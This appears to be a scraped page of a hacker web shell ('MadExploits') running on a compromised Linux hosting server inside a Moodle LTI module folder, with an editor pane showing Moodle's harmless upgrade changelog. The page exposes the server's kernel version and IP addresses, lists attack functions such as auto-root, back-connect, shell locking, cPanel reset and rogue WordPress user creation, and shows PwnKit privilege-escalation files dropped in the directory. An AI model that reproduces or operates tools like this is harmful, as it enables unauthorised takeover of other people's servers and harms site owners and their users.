Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.71.255.134
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
mod /
lti /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
amd
[ DIR ]
drwxr-xr-x
backup
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
pix
[ DIR ]
drwxr-xr-x
service
[ DIR ]
drwxr-xr-x
source
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
OAuth.php
27.91
KB
-rw-r--r--
OAuthBody.php
5.41
KB
-rw-r--r--
TrivialStore.php
4.87
KB
-rw-r--r--
ajax.php
3.18
KB
-rw-r--r--
auth.php
5.87
KB
-rw-r--r--
certs.php
1.16
KB
-rw-r--r--
contentitem.php
2.43
KB
-rw-r--r--
contentitem_return.php
3.75
KB
-rw-r--r--
edit_form.php
18.63
KB
-rw-r--r--
externalregistrationreturn.php
2.31
KB
-rw-r--r--
index.php
4.46
KB
-rw-r--r--
instructor_edit_tool_type.php
3.89
KB
-rw-r--r--
launch.php
3.53
KB
-rw-r--r--
lib.php
26.92
KB
-rw-r--r--
locallib.php
151.95
KB
-rw-r--r--
mod_form.js
23.42
KB
-rw-r--r--
mod_form.php
18.59
KB
-rw-r--r--
openid-configuration.php
2.63
KB
-rw-r--r--
openid-registration.php
2.39
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
register.php
4.39
KB
-rw-r--r--
register_form.php
4.33
KB
-rw-r--r--
registersettings.php
3.09
KB
-rw-r--r--
registration.php
1.4
KB
-rw-r--r--
registrationreturn.php
3.47
KB
-rw-r--r--
request_tool.php
2.57
KB
-rw-r--r--
return.php
4.71
KB
-rw-r--r--
service.php
7.47
KB
-rw-r--r--
servicelib.php
9.89
KB
-rw-r--r--
services.php
3.01
KB
-rw-r--r--
settings.php
8.03
KB
-rw-r--r--
startltiadvregistration.php
1.71
KB
-rw-r--r--
styles.css
7.95
KB
-rw-r--r--
token.php
3.42
KB
-rw-r--r--
toolconfigure.php
2.09
KB
-rw-r--r--
toolproxies.php
6.4
KB
-rw-r--r--
toolssettings.php
3.83
KB
-rw-r--r--
typessettings.php
5.61
KB
-rw-r--r--
upgrade.txt
3.69
KB
-rw-r--r--
upgradelib.php
2.08
KB
-rw-r--r--
version.php
2.58
KB
-rw-r--r--
view.php
8.2
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : upgrade.txt
This files describes API changes in the lti code. === 3.10 === * Select Content supports multiple, allowing a tool to return more than one link at a time. Parameter multiple in function lti_build_content_item_selection_request() is now set to true. * Deprecated unused function after external function, 'get_tool_proxies()', was refactored: - serialise_tool_proxy() === 3.8 === * The following functions have been finally deprecated and can not be used anymore: * lti_scale_used() === 3.7 === * Deprecated functions to add support for LTI 1 tools to access services: - mod_lti\local\ltiservice\service_base->check_tool_proxy() - mod_lti\local\ltiservice\service_base->check_type() - mod_lti\local\ltiservice\resource_base->check_tool_proxy() - mod_lti\local\ltiservice\resource_base->check_type() - mod_lti_edit_types_form->get_lti_advantage_services() replaced by: - mod_lti\local\ltiservice\service_base->check_tool() - mod_lti\local\ltiservice\resource_base->check_tool() - mod_lti_edit_types_form->get_lti_services() * Deprecated unused function: - mod_lti\local\ltiservice\service_base->get_configuration_parameter_names() * Deprecated functions to simplify implementation of LTI scopes for accessing services: - mod_lti\local\ltiservice\resource_base->get_permissions() - ltiservice_gradebookservices\local\resources\lineitem\get_permissions() - ltiservice_gradebookservices\local\resources\lineitems\get_permissions() - ltiservice_gradebookservices\local\resources\results\get_permissions() - ltiservice_gradebookservices\local\resources\scores\get_permissions() - ltiservice_memberships\local\resources\contextmemberships\get_permissions() replaced by: - mod_lti\local\ltiservice\service_base->get_permitted_scopes() - ltiservice_gradebookservices\local\service\gradebookservices->get_permitted_scopes() - ltiservice_memberships\local\service\memberships\->get_permitted_scopes() * Deprecated function to remove definition as static: - ltiservice_memberships\local\service\memberships\get_users_json() replaced by: - ltiservice_memberships\local\service\memberships\get_members_json() === 3.4 === * The following functions, previously used (exclusively) by upgrade steps are not available anymore because of the upgrade cleanup performed for this version. See MDL-57432 for more info: - mod_lti_upgrade_custom_separator() === 3.2 === * Support for LTI ContentItem message type. * New function lti_build_content_item_selection_request() for building an LTI ContentItemSelectionRequest. * New Select content button in External tool configuration page that lets the user configure an external tool by fetching tool configuration content from the preconfigured tool's content selection interface. === 3.1 === * When requesting a grade from the outcome service, and empty grade will now be returned as an empty grade in accordance with the spec. Previously a grade of 0 would be returned. === 3.0 === * Function lti_view (locallib.php) was renamed to lti_launch_tool. A new and different lti_view function was created in the module lib.php containing the code for launching events and update the completion status for the module. === 2.8 === * Support for LTI 2 added, including extensible services implemented as ltiservice plugins. * Function sendOAuthBodyPOST removed from OAuthBody.php because it was not being used. * The field 'grade' in the table {lti} is now an integer rather than a numeric to bring it in line with the 'grade' field in other activities. === 2.7 === * mod_lti\event\unknown_service_api_called now has less data stored in 'other' but everything is still available for event observers via method get_message_data()
Close